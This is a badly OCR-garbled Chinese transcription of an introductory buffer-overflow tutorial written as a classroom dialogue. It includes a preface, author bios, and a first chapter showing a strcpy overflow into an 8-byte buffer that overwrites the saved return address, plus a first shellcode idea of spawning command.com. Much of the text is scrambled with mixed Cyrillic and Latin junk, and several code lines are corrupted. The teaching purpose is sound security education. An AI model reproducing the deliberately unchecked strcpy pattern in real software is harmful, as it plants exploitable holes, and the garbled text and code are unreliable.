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Ес, 332 ВА, RHK Pa 45, Rae (ЖЕ рна) , m iEÜESIIBBUER 
书 ， 在 这 里 向 王 炜 老大 道歉 ! ! ADSESSEBBUSRTGTERGMTA. AMERITA X E = + 
到 ...... 不 找 什么 借口 了 ， 我 会 补 一 个 正版 书 的 ， 同 时 也 希望 所 有 在 读 《 黑 手 缓冲 区 渝 出 教 

程 》 或 者 这 个 文档 的 朋友 能 买 上 正版 书 ， 以 表示 对 原作 者 的 尊重 | 


言 为 正 传 吧 ， 本 来 这 个 寒假 打算 的 是 再 温习 一 下 汇编 的 ， 可 临近 放假 时 ， 让 我 得 到 了 《黑手 
缓冲 区 浴 出 教程 》 这 个 电子 书 ， 不 由 得 心动 ! чо УЕ 


实 我 学 习 缓 冲 区 浴 出 了 很 久 了 (大 概 三 年 了 ) ， 可 是 总 党 得 自己 学 的 东西 很 恤 碎 ， 不 是 那 
na 
一 下 缓冲 区 浴 出 。 


由 于 黑手 的 电子 书 看 起 来 实在 太 麻 烦 ! 那么 多 的 对 话 框 外 加 上 还 要 密码 ! 而 我 的 水 平 又 太 四 
了 ， 真 的 没有 办 法 将 电子 书 的 内 容 从 EXE 中 分 离 出 来 ， 于 是 我 决心 将 这 本 书 档 从 头 到 尾 的 打 
出 来 用 Word 排 好 版 ， 一 来 算是 为 了 巩固 目 己 的 所 学 ， 二 来 也 算是 麻 练 一 下 目 己 的 角力 ， 再 者 
束 是 方便 所 有 想 学 习 这 个 的 朋友 ， 最 后 ， 这 个 文档 诞生 了 


再 由 于 本 文档 打字 带 排版 总 共用 时 才 不 到 5 个 星期 ， 而 且 又 完全 是 手 抄 ， 所 以 错误 之 处 在 所 


难 鲍 ， 而 我 又 没有 太 多 的 时 间 来 排版 和 纠正 文档 中 的 错误 ， 所 以 我 束 站 接 用 DOC 格 式 共 享 给 
大 家 ， 大 家 在 阅读 的 时 候 ， 如 果 发 现 什么 问题 就 直接 修 改 或 重新 排版 ， 并 将 自己 的 名 字 填 到 
下 面 我 预 留 的 地 方 ， 然 后 在 网 上 公布 ， 来 保证 这 个 文档 的 不 断 完善 ， 同 样 也 可 以 根据 签名 来 
辨认 哪个 文档 更 完善 | 


同时 也 希望 大 家 能 尊重 一 下 我 的 劳动 成 果 ， 不 要 象 网 上 的 某 些 人 ...... 
俗话 说 ， 一 年 之 际 在 于 春 ， 我 最 后 也 写 一 下 我 新 一 年 中 要 完成 的 几 个 目标 ， 


1、 在 看 雪 论 坛 上 ， 至 少 出 现 两 篇 我 的 精华 文章 

2. 写 一 个 能 拿 得 出 手 的 程序 ! 

3. 将 老 罗 的 那 本 《Win32 汇 编程 序 设计 》 和 《加 密 与 解密 》 再 看 一 边 ， 并 留 好 笔记 ! 
我 的 所 有 进展 都 会 在 我 的 博客 上 保持 更 新 ， 希 望 大 家 能 多 来 指教 | 

我 的 博客 地 址 : Http://www.cifly.cn/ 

美丽 四 破 舱 
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路 漫漫 其 修 远 兮 吾 将 上 下 而 求索 
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作者 名 称 : Eh 7588 


作者 简 简介 


Е)% : 男 ，1981 年 生 于 川 泥 小 镇 泸州 。 生 于 酒 城 但 不 能 喝酒 ， 现 是 四 川 大 学 信息 安全 专业 硕 
EARE, 


勤奋 有 余 ， 天 赋 不 足 ， 还 好 总 有 有 民 病 益友 ， 让 我 能 一 步 步 的 前 进 。 本 科 时 ， 鲁 代表 学 校 参 加 
国际 大 学 生 程序 设计 竞赛 (ACM/ICPC) 、 全 国 数学 建 模 竞 赛 ， 还 有 星际 争霸 比赛 ， 成 绩 总 
А1, Е 1 现 主 要 从 事 缓冲 区 浴 出 漏洞 的 研究 ， 在 国内 各 安全 专业 杀 志 上 发 表 过 
多 篇 缓冲 区 洽 出 利用 相关 文章 。 现 在 奋斗 的 愿 吾 是 能 去 微软 亚洲 研究 院 工程 院 实 习 ， 寻 找 当 
年 ACM 队 的 队长 。 


方 勇 : 博士 ， 四 川 大 学 电子 信息 学 院 副 教授 ， 通 信和 与 信息 系统 专业 硕士 生 导 病 。 主 攻 研 究 网 
络 系统 与 信息 安全 方向 ， 从 事 信 息 系 统 安 全 的 整体 框架 的 研究 。 发 表 多 篇 信息 安全 方面 论 
x, 主编 过 + 国家 信息 安全 核心 教程 一 一 《信息 系统 安全 一 书 。 


主要 角色 简介 


老病 : 尽职 尽责 ， 不 断 进取 的 楷模 ; 授课 方式 幽默 风趣 ， 并 经 常 带动 同学 们 思考 讨论 ; 不 仅 
传授 学 生 们 技术 ， 更 重要 的 是 引导 学 习 的 方法 ; 可 能 是 作者 理想 中 的 老病 形象 吧 1 


宇 强 、 小 倩 : 主角 (如 果 可 以 这 么 说 的 话 ) ， 宇 强 的 悟性 很 强 ， 能 对 已 掌握 的 知识 融会 员 通 , 
举一反三 。 小 倩 是 位 聪明 的 PLMM， 也 是 男 主角 的 心上人 。 


古风 : 有 非 芝 勤奋 的 精 伸 和 非常 好 的 记忆 力 ; 不 足 之 处 是 太 过 细节 ， 有 时 不 能 抓 住 概 要 和 重 
点 


JINO 


ER : 总 是 想 比 较 轻 松 的 完成 学 习 和 工作 ， 这 种 态度 不 可 取 ， 但 这 种 发 散 的 思维 有 时 还 是 有 
一 定 用 处 的 1 


~ 3 LE 
jg ic TE A 
Ж 35 Eu T+4JJS рсн FH B ERR RASSE 2] HO POI Hi AK BJBB K, 


AP А ВЈ НИКА E AAA, Windows h PCs EH 4s fe BJ ЛЕП ЛЕЛЕ ETT e 
细 分 析 ; HAKE E DIR ВУЗЕ SUR FH SE (1 — KX К ES] BE, 


本 书 没有 枯燥 的 、 大 段 汇编 代码 的 解释 ; 没有 复杂 的 、Windows 系 统 结构 的 定义 ， 阅 读 起 来 
不 会 有 混混 欲 睡 的 乏味 感 | 


书 里 面 ， 有 的 是 活 波 生动 的 语言 ; 有 的 是 的 美好 纯真 的 校园 生活 ; 有 的 是 可 遇 不 可 求 的 经 
X ; 有 的 是 前 截 了 当 、 图 文 并 成 的 手把手 操作 ; 有 的 是 引导 读者 感受 程序 设计 的 艺术 ， 并 在 
缓冲 区 渝 出 的 美妙 世界 中 邀 游 ; 有 的 提示 和 建议 是 能 引起 读者 浓厚 的 兴趣 ， 能 够 自觉 下 去 下 
找 相关 的 资料 完善 自己 。 


知识 束 像 一 个 圆 ; 圆 的 面积 是 你 所 知道 的 东西 ; 圆 的 边 长 是 你 不 知道 的 东西 。 圆 越 大 ， 那 么 
边 束 越 长 。 所 以 当 你 知道 得 越 多 ， 那 么 你 不 清楚 的 束 更 多 | 


所 以 ， 我 们 都 要 目 觉 的 学 习 ， 不 断 的 勤奋 学 习 ， 这 样 才能 不 落伍 ， 才 能 与 当今 纷 休 的 储 会 况 
F | 


缓冲 区 浴 出 是 安全 论坛 上 最 章 见 的 问题 ， 包 括 堆 栈 缓冲 区 的 利用 思想 ，ShellCode 的 初步 编 
写 、 变 形 、 高 级 利用 ， 以 及 堆 浴 出 的 利用 ， 漏 洞 的 亲自 分 析 等 。 当 然 ， 每 个 部 分 都 有 大 量 的 
实例 ， 让 大 家 实际 操作 ， 学 以 致 用 。 


后 一 章 都 以 前 一 章 为 基础 ， 逐 渐 深入 并 展开 。 在 学 习 前 面 的 内 容 时 ， 如 果 有 些 地 方 不 了 解 ， 
可 以 在 后 面 的 章节 中 找到 答案 ; 后 面 不 清晰 的 地 方 ， 也 可 以 翻 看 前 面 的 知识 ， 以 进一步 巩固 
На! 


如 果 读 者 能 在 日 忙 之 中 抽出 5 分 钟 时 间 来 翻 看 这 本 书 ， 那 么 我 希望 能 吸引 你 再 用 几 个 小 时 的 时 
间 来 读 完 这 本 书 。 然 后 用 更 多 的 时 间 ， 去 实际 操作 书 中 的 每 一 个 例子 ， 进 一 步 的 学 习 ， 进 一 
5 8) 3 ESSE, 


“PR R EAS BIO. ZE ja AF >J НИЕ ЕНИ] js] RARE эх E t НОЕ js] SERE HH ORB 28 35 Z Eo 
有 些 可 能 是 翻 带 资料 都 找 不 到 答案 的 注意 事项 。 


веја, PERRERA R ARE AAI 8] ! 


#— =. Windows FIER AHA] 


1.4 #, BARH 


大 学 生活 开始 了 ， 一 切 都 是 那么 美好 、 宁 静 。 精 伸 雪 鲸 的 长 须 学 者 ， 行 色 匆 匆 的 赶路 人 ， 明 
星 焰 烛 的 谷 潭 月 影 ， 甜 蜜 的 对 对 恋人 ， 似 乎 是 大 学 校园 里 永恒 的 画面 。 





在 某 个 教室 里 ， 正 在 上 一 门 特殊 的 课 网 络 攻防 。 说 它 特殊 ， 其 实 只 是 对 外 人 而 言 ， 因 为 
在 他 们 看 来 ， 这 门 课 显 得 有 些 人 利 秘 与 高 深 。 


让 我 们 一 起 推 开 教室 的 门 ， 感 悟 一 下 他 们 的 学 习 和 讨论 氛围 吧 。 咕 NEA! 


让 我 们 的 梦想 在 这 里 实现 吧 ...... 


1.2 ПК ——– Th PC HIRE 


第 一 节 课 ， 各 位 同学 都 规 规矩 矩 的 坐 在 位 置 上 ， 看 看 老 羡 ， 大 气 也 不 慑 出 。 


老病 带 看 眼镜 ， 一 副 精 干 的 样子 ， 看 出 了 大 家 紧张 的 伸 情 ， 于 是 说 道 : “大 家 .这么 紧张 干 嘛 是 
怕 这 门 课 的 技术 还 是 怕 这 门 课 的 老病 一 一 我 啊 我 很 好 说 话 的 ， 都 是 年 轻 人 听 ; RR, ШШ 
我 更 好 啦 一 一 它 是 不 会 说 话 的 。” 


“呵呵 | 是 呀 ! 是 呀 1 "大 家 听 了 老病 的 独白 都 笑 了 ， 气 氛 一 下 活跃 了 不 少 。 
老病 停 了 一 下 ， 问 道 : "同学 们 ， 这 门 课 叫 ' 网 络 攻防 :， 那 你 们 知道 网 络 上 的 攻击 手段 哪些 么 ” 


大 冢 听 了 ， 马 上 七 跨 八 和 天 的 应 到 : “Батл РАЈТ, ВАЛ. AKAN., Xl 
H. IRR... " 


“了 哈哈， 对 1 "老病 满意 的 说 道 ,“ 大 家 说 得 很 好 ! 攻防 是 个 全 方位 的 问题 ， 涉 及 到 诸多 技术 ， 
但 我 们 课时 有 限 ， 第 一 学 期 只 能 讲 几 个 有 限 的 部 分 。 现 在 最 流行 的 有 攻击 手段 两 种 方式 ， 一 
种 是 SQL 注入 ， 另 一 种 融 是 缓冲 区 浴 出 攻击 。 我 们 选 一 个 作为 首先 讨论 的 主题 吧 ! ” 


“好 啊 ， 好 啊 |" 

“不 过 讲 什 么 呢 好 像 都 挺 有 意思 的 。” 一 位 女生 说 道 。 
“不 知道 ， 投 硬币 吧 1 "一 个 胖乎乎 的 同学 说 。 

老病 眼镜 一 亮 ， 说 : “对 ， 真 是 个 好 办 法 ! ” 


老病 措 出 一 个 硬币 ， 拍 在 手中 说 : “如 果 是 正面 惑 移 讲 缓冲 区 浴 出 ， 反 面 融 先 讲 SQL 注 人 。 " 语 
吾 刚 洛 ， 硬 币 融 在 实 中 划 出 一 道 美 妙 的 趾 线 ， 落 在 地 上 转 了 几 圈 后 分 了 下 来 。 


前 排 的 几 个 同学 壮 着 胆子 图 上 去 看 ， 叫 道 : “是 正面 也 1” 
“Hf ! BAT ACRES ! 注入 留 在 以 后 讲 ! "老病 说 道 。 


“不 过 似乎 很 难 也 ...... 一 个 瘦 瘦 的 但 很 精神 的 同学 说 。 “ВІН | 大 家 只 要 有 信心 、 有 效力 ， 
就 一 定 能 战胜 ，Follow me ! ” 


“好 ， 首 先 让 我 们 来 认识 一 下 缓冲 区 以 及 缓冲 区 浴 出 吧 1 "老师 说 。 


“和 作 下 类 比 ， 如 果 荣 个 人 把 一 瓶 啤酒 全 部 倒 人 一 个 小 杯子 中 ， 那 疼 不 下 的 啤酒 融会 四 义 冒 
出 ， 流 到 果子 上 ， 这 个 大 家 都 清楚 吧 |” 


“是 啊 ! 是 啊 1" 男 生 们 都 遗憾 的 说 到 ,，“ 那 好 浪费 啊 1” 
那个 肿 胖 的 同学 说 : “这么 好 的 天 ， 啤 酒 、 小 菜 ， 再 加 上 超 爆 DVD 大 片 ， 好 舒服 啊 1 ” 
“ 融 是 啊 ， 谁 这 人 么 做 的 抑 出 来 打 一 上 顿 ! "大 家 的 情绪 做 带动 起 来 了 。 


安静 ! 安静 ! "老病 好 不 容易 把 持 序 维护 下 来 ， 然 后 兴致 素 然 的 说 ,，“ 我 只 是 打 个 比方 而 已 ! 
你 们 什么 都 能 联想 到 吃 。 那 位 同学 ， 你 叫 什 么 名 字 呢 ” 


那 位 胜 脸 的 同学 老实 的 答 道 : “我 叫 玉 波 。” 玉 波 果 然 像 名 字 一 样 ， 长 的 白白 有 有 的 ， 一 张 贺 平 
乎 的 脸 ， 挺 可 爱 的 样子 。 


“不 过 我 很 理解 你 们 ， 食 堂 的 饭 亲 是 太 难 吃 了 。" 老 病 挺 同情 的 说 道 ,“ 大 学 食 苟 束 是 伤心 太平 
洋 啊 1” 


“ 险 哈 哈哈 ..…....” 同 学 们 都 乐 了， 教室 里 充满 了 愉快 的 笑 声 。 


等 大 家 平稳 下 来 后 ， 老 病 继 续 说 道 :“ 同 样 的 道理 ， 在 计算 机 内 部 ， 输 入 数据 通常 被 存放 在 一 
个 临时 空间 内 ， 这 个 临时 存放 空间 束 人 外 称 为 缓冲 区 ， 缓 冲 区 的 长 度 事先 已 经 馈 程序 或 者 操作 
系统 定义 好 了 。 缓 冲 区 下 很 像 那个 啤酒 杯 ， 用 来 小 东西 ， 而 且 大 小 固定。” 


“向 缓 冲 区 内 填充 数据 ， 如 果 数 据 的 长 度 很 长 (如同 那 汝 啤酒 ) ， 超 过 了 缓冲 区 (那个 啤酒 
М) 本 身 的 容量 ， 那 么 结果 束 如 同 啤酒 一 样 ， 四 处 浴 出 ， 数 据 也 会 浴 出 存储 空间 1 7 КАЈ 
啤酒 会 流 到 果子 上 ， 而 委 不 下 的 数据 则 会 覆 兰 在 合法 数据 上 ， 这 融 是 缓冲 区 和 缓冲 区 浴 出 的 
道理 。 

“当然 在 理想 的 情况 下 ， 程 序 检查 每 个 数据 的 长 度 ， 并 且 不 允许 超过 缓冲 区 的 长 度 大 小 ， 残 像 
在 倒 啤 酒 的 时 候 ， 啤 酒 要 冒 出 杯子 时 我 们 融 停 止 。 但 有 泽 程序 会 假设 数据 长 硫 总 是 与 所 分 配 
的 存储 空间 相 匹 配 ， 而 不 作 检 查 ， 从 而 为 缓冲 区 渝 出 埋 下 隐患 。” 

“OK， 那 我 们 如 何 利用 缓冲 区 浴 出 呢 在 一 般 情 况 下 ， 融 像 啤酒 会 到 义 流 满 果 面 一 样 ， 洽 出 的 数 
据 会 履 兰 挨 任 何 数据 、 指 针 或 内 容 。 除 了 破坏 之 外 ， 对 攻击 者 来 说 没有 任何 好 多 。 但 我 们 可 


引导 洽 出 的 数据 ， 使 计算 机 执行 我 们 想 要 的 命 分 。 这 融 是 很 多 漏洞 公告 上 说 的 : 墨客 可 以 用 
精心 构造 的 效 据 .……。 道 理 融 是 这 样 。” 
“如 果 初 学 ， 还 不 熟悉 这 个 概念 ， 可 先 把 缓存 区 渝 出 利用 理解 为 允许 攻击 者 往 某 个 程序 变量 中 


放 一 个 比 期 望 长 度 要 长 的 值 ， 由 此 以 当前 运行 该 程序 的 用 户 的 特权 执行 任意 命 分 。” 
“而 具体 的 利用 和 方法 ， 融 是 如 何 精 心 构 人造 。" 老 羡 最 后 说 道 。 


1.3 神秘 的 Windows 系 统 


“大 家 都 听 明 白 了 吗 " 老 病 问 大 家 。 


“bw | "同学 们 高 高 兴 兴 的 说 ,“ 明 白 什 么 是 缓冲 区 浴 出 了 ! 就 是 啤酒 和 杯子 嘛 |! 那 我 们 就 开 
RFJ EA YI, Фу!” 


“E Hk | 这 只 是 最 基本 的 缓冲 区 浴 出 原理 ， 要 想 掌 握 利 用 还 早 着 呢 ! 都 坐 下 1 "老病 又 好 气 又 
好 笑 的 说 。 


竺 大 家 又 安静 下 来 后 ， 老 病 说 : "学 缓冲 区 浴 出 要 有 信心 ， 但 也 不 能 浮躁 ， 知 道 缓冲 区 的 系统 
结构 吗 知道 怎么 执行 我 们 想 要 的 程序 吗 虽 ” 


大 家 摇 摇 头 : “不 知道 。” 
“好 ， 既 然 不 知道 ， 那 就 安安 静 静 的 坐 好 ， 马 上 就 是 最 关键 的 地 方 了 。” 
同学 们 问 道 : “什么 关键 的 地 方 呢 ” 


“ 束 是 Windows 系 统 内 部 处 理 缓冲 区 的 机 制 ， 我 们 明白 了 这 个 之 后 ， 束 可 利用 缓冲 区 渝 出 漏洞 
来 控制 别人 的 主机 。” 


“ 哇 ， 好 哦 1" 教 宇 里 一 阵 欢呼 。 


“为 了 讲 清 楚 Windows 是 如 何 处 理 缓 冲 区 的 ， 我 们 先 看 一 段 很 科 单 的 程序 。 考 虑 到 大 家 的 初学 
基础 ， 我 会 尽量 少 提 复 杂 的 代码 ， 多 作 感 性 的 讲解 。” 


“是 啊 ， 一 看 复 条 的 代码 融 头 大 ， 这 样 好 啊 ! "又 一 阵 欢 呼 。 


“对 ， 我 的 目的 融 是 让 你 们 知 关 那些 复 条 代码 是 如 何 来 的 ， 而 理解 了 下 面 这 个 很 简单 的 程序 ， 
再 看 其 他 的 那些 程序 时 ， 会 发 现 思路 基本 上 都 是 一 样 的 。” 


“m | 好 1 那 快 给 我 们 看 看 那 段 程序 吧 ! "ХААНАА У. 
“大 家 的 热情 都 很 高 啊 ， 好 的 1” 


1.3.1 浴 出 例子 一 一 报错 对 话 框 
“这 个 很 简单 的 程序 是 这 样 的 。"” 老 羡 在 墙 上 做 出 投影 。 


/* 很 简单 的 程序 : */ 

#include<stdio.h> 

#include<string.h> 

char name[] = “ww0830”;pu 

int main() 

{ 
char output [8]; 
strcpy(output, name); 
for(int i=0;i<8&&output[i]; i++) 
printf ( "\\Ох%х", оиёриё[1]); 
return 0; 


“这 个 程序 ， 还 比较 简单 吧 ? "3 ys Jy LD а РЕЈА), 
EF- ERA, [51146 55 AE... 

“好 ， 我 来 解释 一 下 ! 这 是 用 C 语 言 写 的 程序 1 "老病 说 。 
AFIR : "地球 人 都 知道 1 


“不 要 急 ， 我 一 句 一 句 的 来 。 首 先 ， #псіиае<ѕіаіо.һ> 和 #include<string.h> 是 包含 这 两 个 头 
文件 进来 ， 因 为 后 面 使 用 的 strcpy 函 数 和 printf 现 数 是 这 两 个 头 文 件 中 定义 的 。” 


"Aim, charname[] = “00830”; 是 把 "name' 这 个 数组 赋值 ， 往 里 面 放 和 人 'ww0830' 这 几 个 字 


“ 哦 ， 为 什么 要 放 和 人 ww0830 而 不 放 其 他 的 呢 ? "大 家 疑惑 不 解 。 


“因为 这 是 我 的 名 字 啦 ， 哈 哈 ! 这 个 并 不 重要 ， 什 么 都 可 以 放 ， 后 面 大 家 就 会 看 到 的 。 然 后 是 
int main()( ...... }， 这 人 Pec 这 就 是 我 们 常 说 的 主事 数 |! 程序 进来 就 是 先 找 到 这 个 地 
方 ， 执 行 里 面 的 语句 。” 


“ 接 下 来 的 char output[8]; strcpy(output, пате); 就 是 让 系统 给 output 变 量 分 配 8 个 char 的 空 
闻 ， 然 后 把 "name" 里 面 装 的 字符 拷贝 给 它 。” 


“strcpy (des, source) 这 个 拷贝 函数 是 把 第 二 个 参数 source 的 值 拷 给 第 一 个 参数 des。 它 不 
检查 拷贝 的 基 度 ， 它 会 一 直 拷 贝 ， 站 到 source 到 结尾 。 这 就 是 它 的 弱点 了 1! ” 


“下 面 的 for(int i=0;i<8&&outputí[i];i++) u a a 只 是 让 大 家 方便 检查 output 里 
面 的 值 而 已 ， 我 把 它 以 16 进 制 的 形式 打出 来 。 


а РОЛАН, — 8%, 


“好 ， 让 我 们 运行 一 下 ， 看 看 结果 吧 ! 在 VC 中 编译 、 链 接 、 执 行 ， 如 图 1 一 1。” 
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Hinclude <stdio.h> 
Hinclude €string.h? 
char name[] = "wuwB838B'; 
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8-2 over classes 








int маіпќ ) 
i 
char output[8]; 









strcpy(output, name); 
for(int i-8;i«8&&output[i];i**) 
printf("XXüxtx",output[i]); 


return B; 


c^ "FA study E S s Р XB Debug!over.exe" 
sbb г sP r ahaa sl 33 sP 3tiPres=s= any key to continue 











üuer.exe - B erroris), B warn 





“看 ， 打 出 来 的 是 \0x77\0x77\0x30\0x38\0x33\0x30 ，77 就 是 'w' 的 16 进 制 表 示 ， 而 30、38、 
33、30 残 是 ‘0830’ 的 16 进 制 表 示 。 程 序 运 行 后 一 切 正 常 ， 把 ww0830’ 的 16 进 制 打 出 后 ， 安 全 
退出 了 。” 


' 昌 ， 呼 .……" 台 下 长 出 了 一 口气 ， 连 几 个 女生 也 说 道 , “对 ， 明 白 了 ， 明 白 了 。 


呵呵， 大 家 明白 了 融 好 。 刚 才 大 家 不 是 问 为 什么 要 输入 ww0830' 吗 ， 好 上 那 我 稍微 改 一 下 ， 
改 成 其 他 的 。” 


这 次 我 把 name[] 的 值 赋 成 abcdefgh"， 大 家 再 看 看 运行 的 结果 有 什么 问题 没有 ! 如 图 1 一 2。” 





E 文件 @ш 查看 搬入 E SF IA gn #5 BEIE 


= zü y Ba "P кй Ол» m mi = Gg [bind EI 
[с [Globals] = All global members || $ main JA- | ge ox t т< 


aj х] Hinclude <stdio.h> 


{їй over classes #include <string.h> 
asses] | char nane[] = "abcdefgh"; 

































int main(í) 
i 
char output[8]; 


strcpyutcoutput, name); 


For (ii [e |" study E Ж, Fifi RB Debug over.exe" 
“Mbl HbA Hab 3 b А МИхЬЬ “Mabb aG xBH Press any key to continus 
pi 


returi 








üuer.exe 一 B error(s), B warm 








dm euge m £w... | ае. | аўы... | &lip....| &]co...] @5ov... | BN +... 二 国画 图 15:59 


癌 下 的 同学 使 劲 的 看 啊 看 ， 什 么 都 没 看 出 来 ， 最 后 玉 波 小 心 蛋 到 的 问 :“ 只 是 把 'abcdefgh' 的 十 
六 进 制 61、62、63 等 打出 来 哇 ， 有 什么 问题 吗 ?” 


老病 盯 了 一 眼 ， 然 后 说 道 : “对! 其 实 束 是 没有 问题 ! ” 
£ FAEBI...... 
^il, Е ЕЕЕ, “EBE L KB На FARENS ” 


这 次 我 把 "name' 再 改 长 点 ， 改 成 'abcdefghijklImnopdqrstuvwxyz' 再 运行 ， 如 图 1 一 3。” 















































еа i R e тае qi Hla 
ПЕТЕ globai membersz]|main АФ moe + ni >| 


жі 到 Hinclude <stdio.h> 
Hinclude <string.h> 
char name[] = "abcdefqghijklmnopqrstuuuxyz' ; 
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int main(í) 
char output[8]; 


ure iia aei name у ; 


SBx61 SBx62 Их63ЗчИхб 4^ Uv y *IMxbb "xb г Wx68y 


| Х| 
e "Ox7ü6F6eed" 指令 引用 的 "0x706f6e6d" 内 存 。 访 肉 存 不 能 为 "read'"。 


Чез ЯЕ, VS Sub WB rE S. 
ЗЕЛЕ, 









ТЕН", 








Ü warnil 





üuer.exe 一 B error(s), 





"ELS... IT, Hir" FERo 


TPE! 不 要 急 。 " 老 评 摆 出 一 副 天 塌 下 来 自己 顶 的 模样 。 “大 家 来 仔细 看 看 这 个 出 错 的 警备 
什么 。” 


“是 0x706f6e6d 引 用 的 0x706f6e6d 内 存 ， 该 内 存 不 能 为 read。 " 玉 波 喃 哨 的 念 道 。 
“你 们 不 觉得 '6d6e6f70 ix ERAT ?我们 的 第 二 个 程序 中 打出 的 .……" 老 症 提 示 道 。 


“R ! abcd' 是 '61626364':， 那 么 '6d6e6f70' 融 应 该 是 nnop 了 。 "和 那 位 道道 的 同学 一 阵 埋 头 音 算 
后 说 道 ! 


“Good， 这 位 同学 能 不 能 给 大 家 介绍 一 下 自己 呢 ?” 


那 位 瘦 瘦 的 同学 说 道 ，“ 我 叫 古 风 。” 


从 古风 灰 所 的 衣服 、 黑 黑 的 脸 上 能 看 出 他 是 从 农村 来 的 。 他 的 眼神 里 带 看 中 华 民 族 勤 奋 刻 藻 
的 优 民 传统 。 


MM "老师 说 道 ，' 我 给 一 个 对 应 转换 表 吧 ， 以 后 大 家 直接 查 就 可 以 
了 。" 老 证 打出 表 1 所 示 的 表格 ， 


w | 一 








(黑手 教程 中 的 这 个 表格 有 问题 ， 所 以 我 目 己 做 了 一 个 贴 了 出 来 ， 并 不 是 原先 的 那个 表格 ) 


1.3.2 XE BUNTE 


“MERKRA, UHER EHAA mhp He 7, ЯРА. Ч ? ftnamel] kk 
较 短 时 不 会 有 问题 ， 反 而 在 比较 长 的 时 候 出 错 。” 


大 家 眉头 紧缩 : “不 知道 。” 
老病 说 :“ 嗯 ， 这 个 就 涉及 到 Windows 的 运行 机 制 了 。” 
"EE | e TEREN!” 


“No， 只 要 理解 了 两 个 概念 ， 再 结合 实际 分 析 一 下 ， 珊 很 简单 了 。 我 会 用 很 简单 的 语言 给 大 家 
解释 。” 

“第 一 个 概念 是 中 断 。 我 举 一 个 日 党 生活 中 的 例子 来 说 明 ， 假 如 你 正在 给 朋友 写 信 ， 电 话 铃 响 
了 。 这 时 ， 你 放下 手中 的 笔 去 搂 电 话 。 通 话 完 毕 ， 再 继续 守信 。 这 个 例子 融 表 现 了 中 断 及 其 
处 理 过 程 : 电话 铃声 使 你 暂时 中 止 当 前 的 工作 ， 而 去 处 理 更 为 急需 处 理 的 事情 GR), 
把 急需 处 理 的 事情 处 理 完毕 之 后 ， 再 回头 来 继续 原来 的 事情 。” 


“第 二 个 概念 是 堆栈 。 计 算 机 为 了 能 回头 继续 处 理 原来 的 事情 ， 就 需要 把 原来 指令 的 指针 EIP 
保存 在 堆栈 中 ; 当 要 回去 原来 的 地 方 时 ， 就 把 保存 在 堆栈 中 的 EIP 恢 复 即 可 。 并 且 名 个 函数 的 
局 部 变量 的 分 配 也 是 在 堆栈 中 。” 


а РОЗЕ. 
“f, ПЕЕВ У AT EERRSUBSAS I." 


小 知识 PUSH 和 POP 





堆栈 是 一 数据 结构 ， 遵 循 “ 先 进 后 出 ， 后 进 先 出 ”的 规则 ， 就 像 我 们 平时 本 盘子 一 样 ， 先 放 在 下 
面 的 最 后 才能 取出 来 ， 最 后 放 上 去 的 最 先 取 出 来 。 而 在 操作 系统 中 ， 存 和 取 的 动作 就 是 PUSH 
和 POP。PUSH 放 一 个 数据 到 堆栈 中 去 ，POP 取 一 个 堆栈 中 的 数据 出 来 。 


1.3.3 浴 出 报错 的 原因 分 析 


“第 一 次 我 们 输入 的 只 是 abcdefgh'。 因 为 要 进入 main 函 效 ， 所 以 系统 把 之 琢 的 EIP 和 EBP 保存 
在 堆栈 中 ， 便 于 以 后 恢复 ; 然后 为 "output[8]' 在 堆栈 中 分 配 8 个 char， 拷 贝 abcdefgh' 到 其 中 。 
要 注意 的 是 ，Windows 下 堆栈 的 分 配 是 高 址 往 低 址 分 配 的 ， 其 结构 如 图 1 一 4。” 


正常 时 的 


^ TEE 


0x61626364 
0x65666768 | 


原 EIP 的 值 M 





nn 


“ВЕ Se main ER 2X 要 把 保存 在 堆栈 中 的 EBP、EIP 恢 复 回 去 ， 融 可 继续 原来 的 执 


行 过 程 而 没有 任何 问题 。” 


^ 


Г] 2 


Е] 17 яа л 2 :“ 大 概 明 白 了 ， 呵 呵 1” 


“好 ， 那 第 二 次 输入 ‘abcdefghijklImnopqrstuvwxyz' 时 ，output 分 配 的 还 是 8 个 字 节 ， 但 却 拷 了 
26 个 字母 进来 ， 和 前 面 比较 ， 其 结果 如 图 1 一 5 所 示 。” 


IE FT BJ 
TEE TRIES OU 


КАЕ 
0х61626364 0х61626364 


0x65666768| hete — 0х65666768 
_ _ ЕВРЕЛа | ЕВР | \ /х696абьбсҹ Wwa |] 2. 


原 EIP 的 值 | ЕР Ox6d6e6f70 


| "De TOS Ead" 1896 0809 тытаны 1$. ГЕТТО mI. 


Es, ñm ur. 
катыш. аюв 1 TA. 





“大 家 注意 了 |! 由 于 拷贝 的 字母 过 长 ， 不 仅 把 分 配给 output 的 8 个 字 节 占据 完了 ， 而 且 还 继续 往 
下 ， 把 保存 的 EBP 和 EIP 给 占据 了 。” 


“ 当 执 行 完 main 函 数 后 ， 系 统 要 恢复 EBP、EIP， 而 EIP 已 经 被 我 们 窗 盖 成 ponm (ВП 
6d6e6f70) 了 。 但 系统 不 知道 ， 就 会 去 执行 ‘6d6e6f70' 位 置 的 东 东 。 而 那个 位 置 是 不 可 污 的 ， 
所 以 就 会 出 错 。” 


“乌拉 | йд И 1" 台 下 一 片 欢腾 。 


“呵呵 ， 现 在 大 家 想 想 ， 我 们 可 通过 履 盖 EIP 为 任意 值 来 让 程序 运行 到 一 个 错误 的 地 方 ， 那 如 
果 我 们 特意 把 EIP 帮 盖 成 我 们 想 去 的 程序 的 地 方 ， 那 会 怎么 样 呢 ?3” 


“我 想 ， 应 该 会 运行 我 们 ' 想 要 的 程序 ' 吧 ! "一 位 浓 眉 大 眼 的 同学 说 道 ， 他 叫 于 强 。 


“很 好 1 "老病 以 赞许 的 目光 看 了 一 眼 宇 强 ,，“ 束 是 这 样 的 。 我 们 来 看 看 ' 想 要 的 程序 ' 的 编写 吧 1” 


1.4 ShellCodez5 5 ñ T 


Mesue igo het ыы а 而 这 里 的 
ShellCode 不 仅仅 指 交 互 了 ， 还 可 以 是 实现 任意 功能 的 代码 。” 


Dhol к 涉及 很 多 方面 ， 在 以 后 的 课程 中 我 们 会 作 详 细 讨 论 ， 这 里 融 不 多 
说 了 。 只 给 个 例子 。 


“我 们 ' 想 要 的 程序 ' 功 能 最 好 是 能 够 开 一 个 DOS 窗 口 ， 那 我 们 就 可 以 做 很 多 事情 ， 比 如 下 面 这 
个 程序 。” 


#include<windows.h> 
int main() 


LoadLibrary("msvcrt.dll"); 


system("command.com"); 
return 0; 


“大 家 看 ! 执行 一 个 command.com 融 可 获得 一 个 DOS 窗 口 ， 在 C 库 函数 里 面 ， 语 名 
ѕуѕіет(“соттапа.сот”); 将 完成 我 们 需要 的 功能 。” 


